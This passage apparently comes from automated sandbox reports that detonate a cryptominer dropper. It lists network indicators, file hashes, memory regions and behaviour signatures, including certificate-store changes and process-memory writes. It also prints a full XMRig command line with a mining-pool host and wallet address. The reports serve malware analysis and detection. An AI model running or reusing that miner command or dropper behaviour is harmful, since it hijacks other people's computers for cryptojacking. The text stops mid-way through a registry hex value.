| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1824-16-0x00000265CE0F0000-0x00000265CE110000-memory.dmp
memory/1824-17-0x00000265CFAF0000-0x00000265CFB10000-memory.dmp
memory/1824-18-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-21-0x00000265CFB10000-0x00000265CFB30000-memory.dmp
memory/1824-19-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-20-0x00000265CFB30000-0x00000265CFB50000-memory.dmp
memory/1824-22-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-23-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-24-0x00000265CFB30000-0x00000265CFB50000-memory.dmp
memory/1824-25-0x00000265CFB10000-0x00000265CFB30000-memory.dmp
memory/1824-26-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-27-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-28-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-29-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-30-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-31-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-32-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-33-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-34-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-35-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-36-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-37-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-38-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-39-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-40-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-41-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-42-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-43-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-44-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-45-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-46-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-47-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-48-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-49-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-50-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-51-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-52-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-53-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-54-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-55-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-56-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-57-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-58-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-59-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-60-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-61-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-62-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-63-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-64-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-65-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-66-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-67-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-68-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-69-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-70-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-71-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-72-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-73-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-74-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-75-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-76-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-77-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-78-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-79-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-80-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-81-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-82-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-83-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-84-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:06
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2324 wrote to memory of 1624 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2324 wrote to memory of 1624 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1624-16-0x00000219DFFD0000-0x00000219DFFF0000-memory.dmp
memory/1624-17-0x0000021A73B40000-0x0000021A73B60000-memory.dmp
memory/1624-18-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-19-0x0000021A73F80000-0x0000021A73FA0000-memory.dmp
memory/1624-20-0x0000021A741B0000-0x0000021A741D0000-memory.dmp
memory/1624-21-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-22-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-25-0x0000021A741B0000-0x0000021A741D0000-memory.dmp
memory/1624-24-0x0000021A73F80000-0x0000021A73FA0000-memory.dmp
memory/1624-23-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-26-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-27-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-28-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-29-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-30-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-31-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-32-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-33-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-34-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-35-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-36-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-37-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-38-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-39-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-40-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-41-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-42-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-43-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-44-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-45-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-46-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-47-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-48-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-49-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-50-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-51-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-52-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-53-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-54-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-55-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-56-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-57-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-58-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-59-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-60-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-61-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-62-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-63-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-64-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-65-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-66-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-67-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-68-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-69-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-70-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-71-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-72-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-73-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-74-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-75-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-76-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-77-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-78-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-79-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-80-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-81-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-82-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-83-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-84-0x00007FF614620000-0x00007FF615123000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:07
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37a